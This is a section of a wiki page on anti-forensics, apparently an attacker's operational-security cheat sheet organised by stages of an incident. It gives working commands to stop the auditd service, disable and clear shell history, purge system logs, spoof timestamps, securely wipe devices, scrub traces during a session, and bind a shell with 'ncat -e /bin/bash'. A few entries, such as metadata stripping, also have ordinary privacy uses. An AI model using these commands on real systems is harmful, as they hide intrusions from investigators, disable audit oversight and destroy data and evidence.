Editing Operational Security (OPSEC) (section)

== <span id="anti-forensics"></span>🛡️ Anti-Forensics ==

Anti-forensics techniques aim to minimize, alter, or eliminate digital traces to hinder investigation and attribution. This includes avoiding disk writes, manipulating metadata, and neutralizing forensic tools.

=== 🧪 Pre-Incident ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Technique !! Description !! Usage
|-
| Memory-only implants || Fileless execution using in-memory loaders or interpreters. || <code>python3 -c 'exec(open("/tmp/script").read())'</code>
|-
| RAM-only storage || Temporary storage that avoids disk persistence. || <code>mount -t tmpfs -o size=512M tmpfs /mnt/tmp</code>
|-
| History redirection || Prevent command history from being saved or recovered. || <code>unset HISTFILE; export HISTFILE=/dev/null</code>
|-
| Diskless execution || Operate entirely from memory using sockets or shellcode injection. || —
|-
| Logging control || Suppress or redirect default logging mechanisms. || <code>systemctl stop auditd</code>
|}

=== ⏳ During ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Technique !! Description !! Usage
|-
| Volatile-only tools || Use tools that execute and vanish from memory without disk artifacts. || <code>ncat -e /bin/bash target</code><br><code>pwsh -enc ...</code>
|-
| Shell session isolation || Avoid using default user shells or system shells directly. || <code>chroot /mnt/volatile /bin/bash</code><br><code>setsid bash -c 'exec bash'</code>
|-
| Output redirection || Pipe outputs to volatile memory or null sink to avoid cache/write. || <code>command > /dev/shm/out</code><br><code>command > /dev/null</code>
|-
| Temp file avoidance || Avoid writing to <code>/tmp</code> or <code>/var/tmp</code> where data may persist. || Use <code>/dev/shm</code> or RAM disk mounts
|-
| Real-time artifact scrubbing || Monitor and erase known forensic traces during session. || <code>lsof | grep deleted</code> + <code>shred</code> in loop
|-
| In-memory enumeration || Use one-liners and streams rather than writing output to files. || <code>ls -la | grep conf</code>
|}


=== 🧹 Post-Incident ===
{| class="wikitable" style="width:100%; text-align:left; background:#1c1c1c; color:#e0e0e0;"
! Action !! Description !! Usage
|-
| Log purge || Rotate and vacuum system logs to eliminate traces. || <code>journalctl --rotate --vacuum-time=1s</code><br><code>logrotate -f /etc/logrotate.conf</code>
|-
| Timestamp spoofing || Alter file metadata to obscure activity timelines. || <code>touch -t 201501010000 file</code><br><code>debugfs /dev/sdX</code>
|-
| Metadata stripping || Remove identifying metadata from documents and images. || <code>mat2 report.pdf</code><br><code>exiftool -all= image.jpg</code>
|-
| Secure deletion || Permanently overwrite files or erase devices. || <code>shred -n 5 -z file</code><br><code>blkdiscard /dev/sdX</code><br><code>hdparm --security-erase</code>
|-
| Bash history purge || Clear shell history and unlink history file. || <code>history -c && unset HISTFILE</code>
|}

=== 🧩 Additional Techniques ===
* Disable swap or use encrypted swap with ephemeral keys.  
* Use ephemeral operating systems (e.g., [[Tails]], [[Kali]] Live).  
* Operate in isolated VM snapshots and revert post-session.  
* Avoid file creation altogether by chaining tools via <code>stdin</code> and <code>stdout</code>.